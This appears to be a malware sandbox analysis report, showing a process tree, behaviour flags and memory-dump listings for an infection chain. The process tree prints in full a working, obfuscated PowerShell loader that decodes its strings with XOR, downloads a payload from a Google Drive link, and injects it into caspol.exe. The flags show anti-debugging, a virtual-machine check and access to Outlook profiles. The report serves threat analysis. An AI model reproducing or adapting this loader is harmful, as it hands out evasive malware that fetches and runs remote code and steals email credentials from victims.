At9DiBMaBDiCBoAaf6SaESm1BoEFl0ri8NiFTyFPeEDiFKr2Ro8Cy9Co8Un7De9ChBKlBTeCSvACo6DoEUn1UnEWi0Di8HaFBoFCoEFeFFi2Tr8Be9Ho8Fi7Ri9KlBMaBViCNoATa6GnEUn1PrEbe0Ce8SnFLaFUdBPaFOv2FoFCeASl8Ti9Co9HaBHjBSpCSpAbo6Le8Ri2StAPr6OrATi0Il8tiFkuFGeBFoFReBSpFEfBOl'Uf;Do&Ve(Ox`$afYViaStrHadTriTi7Fi)St Ny`$CovBeiRyeAutLi6De;Me`$CaTPawBriBucLakMapChlFouAb Su=Ha StfOvkFipSy Mu`$StYGlaSarIsdsaiUn5Dr Tr`$UnYUnaHerShdBoipa6Re;mo`$OpvPaiNeetytHa7St Re=Mi tuHToTFiBFr Di'TrFAd6So8In0UnBGl7LaAUe1MuAFe6stBDe7SuELi1SiFUn2KnEReFMoFIn2FlFTa6VaAGr1ReBSa9KoAPa7MlBBr7JoASp1SpABu2SeFSyCPr9LeBYtBThCRaADi4UnBChDShBHa9BoBPo7CoFUdACo8Me9Id9SyBPrBThCNeADa6fi8Co2TrABr6UnADe0Ci8FoFHnESi8GrEMa8Gr8Va8FiBSt7BdAGe0KrBSpDHoFUdEhuFFi2FrEMa4brEGe6FoEaf3ReFStEVaFBo2ChEma2SeAReAEnETu1GaEEk2SkESv2InELy2PhFRoEUnFEg2TeEOv2MaABrAPrESo6MoESy2AfFBaBTu'Cr;Pe&ar(br`$BeYFraanrAndDoino7Tr)Or sp`$HovPeiCaeGetVr7Fa;Re`$BrvFriBieHetSt8No Re=Ka UnHDaTMoBRu Sp'PiFTr6Re8An0SmBKo7ReBPe3PtBSrEStBBl0AnBSy7SvBHy6dyBNe7SlBSeFHoFst2PeESiFSyFSk2VeFSn6HuAIm1PoBIv9AdADi7BoBCa7AdACo1FoAMe2VuFFoCcr9AnBDoBTrCarAMo4PuBVrDLiBWe9KoBPl7LeFHoAFo8Ja9Bo9PlBErBNeCViABe6El8Kr2FoANo6HyABr0Bo8HeFRiESa8UnETr8Ps8Re8CoBDa7MaAQu0SeBKrDOrFNoERiFKv2ObEEe4KoEAl7PaETr0VaEBr6GlEPu3SuEMo2SyEKaASuERaAAkFSoEkuFRu2SkESi2FaAtyAPrEWh1GrESl2GaEHd2OcEud2DiFBrEHaFTh2DeEUn2AfAEfAraEMa6GaFAnBRe'Ha;Fl&ko(Sa`$BaYSnaBirPrdHeiSk7Ha)Ba Fl`$VivBaiMeeSvtJa8Io;Sa`$YaSIttOvrEvmTreTrrBaeSlnDisKa1Mi3Al9Bo0Br1Bi Me=Un Nr'InhTitgatWipSksKu:La/ac/TrdCerIniSuvWoeOp.SagHyoOnonagSelVeepa.IncDeoBlmno/InuSpcPi?MeeRaxgaprooNorPrtWh=IsdFooHowConUnlSwoseaHvdTe&PriindAg=Bo1SpdTrzAigRe1Hy9Mo2Bo6mepbenMaDFimLe9Je3An5MadSe_DrCOpmVi4apTBlRDrEReqDazGuXBr4KljHa7SuoSlxInJsilKo'mu;Ju`$miSNitTirInmSheAnrNaeHanStsjo1pe3Sw9Ta0He0Ha br=Ha UnHNoTKaBKo He'IcFRe6Br9NoDhaATi4HaBDe7FiACo0ChAEx1foABu2CaBSe7FoBFeCHaBne6KoBDe7SyFCa2InEAtFMoFUn2AmFPoAss9GrCWaBpr7StARe5KaFPiFAf9UeDSuBDu0SaBWa8BiBHe7GoBBe1GlAFe6ToFMa2Wr9raCReBUd7TrAgr6CaFGeCal8Cl5LeBBa7ClBAl0rh9So1SyBLuEHuBSmBpaBKi7SpBafCSkAKo6AnFGeBSkFBeCPe9Bi6SnBTrDDeABo5InBMiCAsBDrEEnBKaDTyBSu3AdBCl6Fi8Ne1KaAPr6FiAIn0MaBMaBSmBSkCUdBCu5SyFdoAInFCy6Bi8Ex1agAUn6huADa0SpBCoFPaBIn7HeAsn0jaBFo7UdBSwCSkANa1WiEGo3VaEPa1AmEInBDeEHa2ThESa3SkFlaBBu'Ne;Ta`$ApvPaiFoeFotsm8Ph Sw=Av KaHDrTTiBPy As'TrFja6Pu8Du0SmBim7KvARi1FaASu6enBPe7MeEBi0CoEChFUnFIn6AvBRe7SkBViCBiADi4CyEUn8AfBVo3FuASp2ElAPh2EmBVe6ReBDk3IsATu6StBPr3Fo'sk;Co&St(Ka`$SaYChaKorChdBuiFn7He)se Wa`$cavraiTaeArtFr8Vr;Bi`$ByRLieDesKatReeSo2st=Tr`$LeRAteHesEntBeere2Su+ba'Kr\NoACapUdoKosUntGeiColUdsMo.KodMiaNotBo'ch;Be`$TaOEkvNueInrHysRapWaeTrnAadFaeSt=Ko'fi'Aa;BeiKrfSa le(Su-SpnHuonotAm(NeTKueCcsLetDi-KoPCraChtRohMa By`$fiRWaeVisoptTresy2Ud)gr)Be Un{SmwFrhPsiDilGreAv Fr(Va`$UdOTrvNyeRirAlsTrpAfeStnPadSoeTo Ld-MoeChqLa An'Sn'Va)Bd Es{pa&Bi(Pe`$LiYlaaAsrCudAfigr7Or)Ek Ma`$AfSSetForkamSeeArrLaeKanUnsBu1Sy3Im9ce0Ae0hu;AlSBotSlaParbatCi-InSBalUseTreBepVo Se5In;Fo}DeSReeSotCo-StCAsoLgnEltKaeStnpltCi Fo`$EmRUdeAtsbetBoeca2Bi ha`$PrOPivScefarPosCapOpeScnUbdPreSa;Mo}Ga`$LoOCavhueNarSmsMapAteFlnUndReeBr Ko=st snGMaeOrtSt-FrCLaoPlndatKreOpnLetVa Dr`$EkRMiePhsHatIneSe2Be;Op`$QuvTeiAneNstBe9Io Po=Ki UdHStTTrBHu ba'BuFPe6PaARy4OtBVeBTuBOn7BrAOs6DoFsl2AbECiFPrFAn2Tr8He9Pe8Sv1SkALeBLsAAr1AbALa6BoBSo7ReBKeFbuFBlCOr9Fo1UhBUpDDuBDiCSaASy4OoBRe7BrARe0ScAOp6Ki8ReFHoEFo8InESc8na9Pa4UnABl0UdBWlDDoBExFDi9St0DeBFr3FiAUb1biBEl7RaERe4riERe6Mi8Aa1AlAEu6BuAHe0KyBSiBUnBSlCDaBDe5OsFAfAZiFIn6Bu9MrDCeAUd4PaBSp7UnAHa0TiARe1reAAl2SiBFe7HaBUnCGaBDr6kuBFr7InFAdBJo'Pe;Re&Ta(Ri`$ceYHyaTvrcadViiSp7No)mi Un`$ThvWeiSoeSttFo9ko;un`$inORevEveKarelsBapInePanHadBieSa0Fi Sv=Fr waHmuTOlBSt Ud'Ni8Ov9Ko8Tr1TrAsmBDiAan1UnADe6NoBSv7EtBMeFCaFOvCPr8Ex0grASn7DiBElCUnAEx6brBBeBWiBSuFLoBSt7StFNoCSy9NgBLyBvaCChADo6SwBEn7SuASt0LoBbeDUpAAn2Po8Ac1ChBRe7prAMa0PrAIg4CeBUnBBaBUn1ovBGa7PrAUn1DiFbrCDe9unFTiBTr3UpAPr0RuAHa1KaBKnAHaBBi3BoBObEre8HaFReEAu8ZeEfe8Od9Re1AsBbeDGrACo2WaAOfBOdFHeABrFBe6KoASl4AmBCoBSlBSu7FiAUn6BaFCaEUdFmi2HoEUn2LeFDeEAfFSk2EnFFo2TaFRe6Th8De0CyBTw7HeACo1HiAWo6SeBhu7PeEKn1GaFAeEEpFVa2BiECa4PeESt6ToEPa3CaFleBVe'No;Ba&En(Pi`$BoYSuaForSkdSuiBe7Am)Er No`$giOJovVoedurtrsBapOeeAunWodfoest0En;Sl`$PhHNeiFeeCrrKn1In4Ve7Ti=Af`$LyvTriVaeMotFe.SacOvoGuuVinlatUn-Co6Pa4Fo1Sa;ps`$trOBavReebarEgsJipPeeGenstdUnedo1Br Hy=Sw SeHJoTEnBTi Un'Un8Ha9Ce8Mo1UnAKeBKnAhi1SrAAn6PrBOr7OvBStFboFWaCsp8Ex0MaAFi7fiBRuCReAFl6OvBReBCoBPeFdiBTa7HeFSoCBj9OpBGaBReCKrASe6WaBHa7MaATi0UnBBrDMuABr2Di8Pr1ShBHy7UnAGe0LeAun4StBKoBreBTi1SiBTi7FeAWr1UhFveCJr9VaFLiBSk3SpAAf0guABl1heBLoAExBDi3BiBSyEGu8DiFBeEsa8ToEPr8In9Op1LeBKaDToARe2PrADiBInFEgABaFFo6HaAUn4EcBTrBDiBCl7StAPn6EpFUrEUnFUn2EqESp4NaECe6InEgo3DaFsoEWiFSu2StFGo6De8Mi0SaBTr7BiBQu3PrBMaEPrBfi0SaBUn7trBsp6StBTr7AbBskFYdFOxEjaFCh2VaFFu6Sy9SoAEkBSoBKoBRu7SpAEn0CaESp3opEDi6AaEFo5DuFFuBVa'tr;Si&Sa(Sl`$QuYAcahorDidStiSo7Un)Bi tr`$meOEnvdaeHirBrsUnpYaePrnFydokeDi1Un;Bi`$HaOBrvAdeperfasCapMieLinSudRieSy2Co Ke=Su ExHReTVoBGe Se'FlFAr6Eu8ta1PoAGu6KoATe0PuBDiDSoBNa5PnBMi3MoFSp2LaEUbFJaFOp2Om8Mi9Tu8Ct1AnADoBSqAco1DeADg6BeBMe7EuBudFAlFBoCPn8Ps0CaASt7ReBCoCCoASt6KoBboBGaBInFPhBTa7StFReCNo9BaBPrBSkCAcAKn6NoBav7KvABr0PaBNdDFlAOs2El8Ba1MaBDo7AmAPa0BaAre4UnBobBQuBBe1SlBLa7ThATi1KlFKrCBe9UnFPeBCa3MaAFo0niAen1PrBmuASkBda3LnBLiERu8RuFKrEVi8MoEne8Ox9Lo5ScBNo7KuAme6An9St6SuBCo7CoBFlEMaBPe7AmBIn5ReBRe3FuARe6VeBDy7De9Ba4ReBLaDKaAAu0Fa9Fo4urAwo7UdBHaCMoBSe1FaATi6PoBBrBhyBOuDTiBFoCTh8No2SiBcoDUnBAfBEfBScCshAFo6SuBSt7tkAAf0VaFBeAExFNoABaBRu4BuBIm9SoAHa2ShFNo2FjFFr6Pi8Sl0MaACr7ArBTe0CaBSm7OcBbe4OrBPu3SiBSt1BiADe6StFTw2FoFPh6Di9MaDudASa4OoBEx7SpAPo0CiAIn2FoFDoBDeFFlEReFPe2CoFMoACo9Ve5Tr9De6As8Co6DeFPe2Gu9Co2SeFAtATa8Ri9Fo9MoBAfBMnCSaABu6Do8Ze2BaARe6ArARa0Ko8AlFHaFReEAfFOv2Un8Co9kd9BaBRuBTrCDrAUl6Pe8Um2GaANe6EpANa0Gr8TiFNiFSpEHaFgy2na8So9Ud9HaBEnBFlCMaAIn6Ja8St2KoAPu6InAAf0Te8SkFStFPsESoFRe2Fi8Cr9co9HoBSkBLfCBeATr6Ce8Be2MyABl6PoAPr0In8PiFPrFunEMyFAl2Ra8Ly9En9KvBnoBKrCAmAPh6te8Fo2GrALy6JaASy0Re8TiFFaFNaBUbFSo2FiFExARu8La9ty9LaBVlBSpCGaAUn6Im8Ha2akAPo6OrAGa0Gr8TrFGtFRuBidFTrBGrFLoBFl'Cr;Ge&Bo(Jv`$OuYOvaHorTudSiiOp7An)Un Sk`$SuOpavDoeMorCasBopDeeTrnIndGleIn2Fo;Fr`$hyOSmvSceParShsUnpHoeTenEmdVuePa3Fr St=Pa UnHFoTPaBTa Si'LaFDe6Im8Pr1BaAse6UnAek0KaBKaDBrBBi5stBco3ViFUdCCo9BoBFaBEtCspAad4HaBUnDUnBAu9DoBCo7OvFIdAAcFOf6Ha8Ca0ilBAf7MeAOp1ToAUn6FuBba7PrEFo1AlFDuESrFFo6Sm8Re0coBTe7AnBEx3FlBLaEReBUn0InBUp7AgBLg6FrBMa7AdBHeFNyFSoEPrFRo6Fr8Br6PaAMo5ExBOvBStBdr1AkBRe9KiAIn2HoBRaEFoAAu7AkFReEMeEDu2StFOcEShEVe2PrFInBUn'Th;Gl&Me(Di`$ReYInaParRadbliAs7Un)In ve`$ToOBrvFoeWarKosSepvaeThnXvdMieCa3Ka#St;""";Function Overspende9 { param([String]$uegennytti); For($Mendicplant216=2; $Mendicplant216 -lt $uegennytti.Length-1; $Mendicplant216+=(2+1)){$Strmerens139 = $Strmerens139 + $uegennytti.Substring($Mendicplant216, 1)}; $Strmerens139;}$Bortska0 = Overspende9 'CaIGdEExXPr ';$Bortska1= Overspende9 $Ligh;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Bortska1 ;}else{&$Bortska0 $Bortska1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$uegennytti); $Eksam = ''; Write-Host $Eksam; Write-Host $Eksam; Write-Host $Eksam; $Unhasti = New-Object byte[] ($uegennytti.Length / 2); For($Mendicplant216=0; $Mendicplant216 -lt $uegennytti.Length; $Mendicplant216+=2){ $Unhasti[$Mendicplant216/2] = [convert]::ToByte($uegennytti.Substring($Mendicplant216, 2), 16); $Unhasti[$Mendicplant216/2] = ($Unhasti[$Mendicplant216/2] -bxor 210); } [String][System.Text.Encoding]::ASCII.GetString($Unhasti);}$polarisati0=HTB '81ABA1A6B7BFFCB6BEBE';$polarisati1=HTB '9FBBB1A0BDA1BDB4A6FC85BBBCE1E0FC87BCA1B3B4B79CB3A6BBA4B79FB7A6BABDB6A1';$polarisati2=HTB '95B7A682A0BDB193B6B6A0B7A1A1';$polarisati3=HTB '81ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4';$polarisati4=HTB 'A1A6A0BBBCB5';$polarisati5=HTB '95B7A69FBDB6A7BEB79AB3BCB6BEB7';$polarisati6=HTB '808681A2B7B1BBB3BE9CB3BFB7FEF29ABBB6B790AB81BBB5FEF282A7B0BEBBB1';$polarisati7=HTB '80A7BCA6BBBFB7FEF29FB3BCB3B5B7B6';$polarisati8=HTB '80B7B4BEB7B1A6B7B696B7BEB7B5B3A6B7';$polarisati9=HTB '9BBC9FB7BFBDA0AB9FBDB6A7BEB7';$Yardi0=HTB '9FAB96B7BEB7B5B3A6B786ABA2B7';$Yardi1=HTB '91BEB3A1A1FEF282A7B0BEBBB1FEF281B7B3BEB7B6FEF293BCA1BB91BEB3A1A1FEF293A7A6BD91BEB3A1A1';$Yardi2=HTB '9BBCA4BDB9B7';$Yardi3=HTB '82A7B0BEBBB1FEF29ABBB6B790AB81BBB5FEF29CB7A581BEBDA6FEF284BBA0A6A7B3BE';$Yardi4=HTB '84BBA0A6A7B3BE93BEBEBDB1';$Yardi5=HTB 'BCA6B6BEBE';$Yardi6=HTB '9CA682A0BDA6B7B1A684BBA0A6A7B3BE9FB7BFBDA0AB';$Yardi7=HTB '9B978A';$Yardi8=HTB '8E';$Rubefact=HTB '87819780E1E0';$Overp=HTB '91B3BEBE85BBBCB6BDA582A0BDB193';function fkp {Param ($Deysosp, $Emanatis) ;$viet0 =HTB 'F69AB7AAB3B7F2EFF2FA8993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC95B7A693A1A1B7BFB0BEBBB7A1FAFBF2AEF285BAB7A0B7FF9DB0B8B7B1A6F2A9F2F68DFC95BEBDB0B3BE93A1A1B7BFB0BEAB91B3B1BAB7F2FF93BCB6F2F68DFC9EBDB1B3A6BBBDBCFC81A2BEBBA6FAF68BB3A0B6BBEAFB89FFE38FFC97A3A7B3BEA1FAF6A2BDBEB3A0BBA1B3A6BBE2FBF2AFFBFC95B7A686ABA2B7FAF6A2BDBEB3A0BBA1B3A6BBE3FB';&($Yardi7) $viet0;$viet5 = HTB 'F681B9A0BBB6A6F2EFF2F69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE0FEF28986ABA2B7898F8FF292FAF6A2BDBEB3A0BBA1B3A6BBE1FEF2F6A2BDBEB3A0BBA1B3A6BBE6FBFB';&($Yardi7) $viet5;$viet1 = HTB 'A0B7A6A7A0BCF2F681B9A0BBB6A6FC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FA8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B48FFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4FAFA9CB7A5FF9DB0B8B7B1A6F29BBCA682A6A0FBFEF2FAF69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE7FBFBFC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FAF696B7ABA1BDA1A2FBFBFBFBFEF2F697BFB3BCB3A6BBA1FBFB';&($Yardi7) $viet1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Pension,[Parameter(Position = 1)] [Type] $Mendic = [Void]);$viet2 = HTB 'F680B7A1A7A0A0F2EFF28993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC96B7B4BBBCB796ABBCB3BFBBB193A1A1B7BFB0BEABFAFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC93A1A1B7BFB0BEAB9CB3BFB7FAF6A2BDBEB3A0BBA1B3A6BBEAFBFBFEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC97BFBBA6FC93A1A1B7BFB0BEAB90A7BBBEB6B7A093B1B1B7A1A18FE8E880A7BCFBFC96B7B4BBBCB796ABBCB3BFBBB19FBDB6A7BEB7FAF6A2BDBEB3A0BBA1B3A6BBEBFEF2F6B4B3BEA1B7FBFC96B7B4BBBCB786ABA2B7FAF68BB3A0B6BBE2FEF2F68BB3A0B6BBE3FEF28981ABA1A6B7BFFC9FA7BEA6BBB1B3A1A696B7BEB7B5B3A6B78FFB';&($Yardi7) $viet2;$viet3 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB791BDBCA1A6A0A7B1A6BDA0FAF6A2BDBEB3A0BBA1B3A6BBE4FEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC91B3BEBEBBBCB591BDBCA4B7BCA6BBBDBCA18FE8E881A6B3BCB6B3A0B6FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet3;$viet4 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB79FB7A6BABDB6FAF68BB3A0B6BBE0FEF2F68BB3A0B6BBE1FEF2F69FB7BCB6BBB1FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet4;$viet5 = HTB 'A0B7A6A7A0BCF2F680B7A1A7A0A0FC91A0B7B3A6B786ABA2B7FAFB';&($Yardi7) $viet5 ;}$Monograms = HTB 'B9B7A0BCB7BEE1E0';$viet6 = HTB 'F6A1B9A7B7A1A2F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F69FBDBCBDB5A0B3BFA1F2F68BB3A0B6BBE6FBFEF2FA959686F292FA899BBCA682A6A08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $viet6;$Twickplu = fkp $Yardi5 $Yardi6;$viet7 = HTB 'F680B7A1A6B7E1F2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E6E3FEF2E2AAE1E2E2E2FEF2E2AAE6E2FB';&($Yardi7) $viet7;$viet8 = HTB 'F680B7B3BEB0B7B6B7BFF2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E7E0E6E3E2EAEAFEF2E2AAE1E2E2E2FEF2E2AAE6FB';&($Yardi7) $viet8;$Strmerens13901 = 'https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl';$Strmerens13900 = HTB 'F69DA4B7A0A1A2B7BCB6B7F2EFF2FA9CB7A5FF9DB0B8B7B1A6F29CB7A6FC85B7B091BEBBB7BCA6FBFC96BDA5BCBEBDB3B681A6A0BBBCB5FAF681A6A0BFB7A0B7BCA1E3E1EBE2E3FB';$viet8 = HTB 'F680B7A1A6B7E0EFF6B7BCA4E8B3A2A2B6B3A6B3';&($Yardi7) $viet8;$Reste2=$Reste2+'\Apostils.dat';$Overspende='';if (-not(Test-Path $Reste2)) {while ($Overspende -eq '') {&($Yardi7) $Strmerens13900;Start-Sleep 5;}Set-Content $Reste2 $Overspende;}$Overspende = Get-Content $Reste2;$viet9 = HTB 'F6A4BBB7A6F2EFF28981ABA1A6B7BFFC91BDBCA4B7A0A68FE8E894A0BDBF90B3A1B7E4E681A6A0BBBCB5FAF69DA4B7A0A1A2B7BCB6B7FB';&($Yardi7) $viet9;$Overspende0 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E2FEF2F2F680B7A1A6B7E1FEF2E4E6E3FB';&($Yardi7) $Overspende0;$Hier147=$viet.count-641;$Overspende1 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E4E6E3FEF2F680B7B3BEB0B7B6B7BFFEF2F69ABBB7A0E3E6E5FB';&($Yardi7) $Overspende1;$Overspende2 = HTB 'F681A6A0BDB5B3F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F680A7B0B7B4B3B1A6F2F69DA4B7A0A2FBFEF2FA959686F292FA899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $Overspende2;$Overspende3 = HTB 'F681A6A0BDB5B3FC9BBCA4BDB9B7FAF680B7A1A6B7E1FEF680B7B3BEB0B7B6B7BFFEF686A5BBB1B9A2BEA7FEE2FEE2FB';&($Yardi7) $Overspende3#"3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/920-73-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/920-86-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/920-89-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/920-88-0x0000000005B60000-0x0000000009998000-memory.dmpFilesize
62.2MB
-
memory/920-85-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/920-68-0x0000000073040000-0x00000000735EB000-memory.dmpFilesize
5.7MB
-
memory/920-62-0x0000000000000000-mapping.dmp
-
memory/920-74-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/920-63-0x0000000075D01000-0x0000000075D03000-memory.dmpFilesize
8KB
-
memory/920-69-0x0000000076F50000-0x00000000770F9000-memory.dmpFilesize
1.7MB
-
memory/920-65-0x0000000073040000-0x00000000735EB000-memory.dmpFilesize
5.7MB
-
memory/920-67-0x0000000005B60000-0x0000000009998000-memory.dmpFilesize
62.2MB
-
memory/964-78-0x0000000076F50000-0x00000000770F9000-memory.dmpFilesize
1.7MB
-
memory/964-81-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/964-82-0x0000000000401000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/964-72-0x00000000000C768E-mapping.dmp
-
memory/964-92-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/964-90-0x0000000076F50000-0x00000000770F9000-memory.dmpFilesize
1.7MB
-
memory/964-87-0x0000000000620000-0x0000000004458000-memory.dmpFilesize
62.2MB
-
memory/964-84-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/964-80-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/964-93-0x0000000077130000-0x00000000772B0000-memory.dmpFilesize
1.5MB
-
memory/964-75-0x0000000000620000-0x0000000004458000-memory.dmpFilesize
62.2MB
-
memory/1636-54-0x0000000000000000-mapping.dmp
-
memory/1812-59-0x000007FEF3A60000-0x000007FEF45BD000-memory.dmpFilesize
11.4MB
-
memory/1812-60-0x0000000002784000-0x0000000002787000-memory.dmpFilesize
12KB
-
memory/1812-66-0x0000000002784000-0x0000000002787000-memory.dmpFilesize
12KB
-
memory/1812-56-0x0000000000000000-mapping.dmp
-
memory/1812-61-0x000000001B730000-0x000000001BA2F000-memory.dmpFilesize
3.0MB
-
memory/1812-91-0x000000000278B000-0x00000000027AA000-memory.dmpFilesize
124KB
-
memory/1812-58-0x000007FEF45C0000-0x000007FEF4FE3000-memory.dmpFilesize
10.1MB
-
memory/1812-64-0x000000000278B000-0x00000000027AA000-memory.dmpFilesize
124KB
-
memory/1952-55-0x000007FEFB971000-0x000007FEFB973000-memory.dmpFilesize
8KB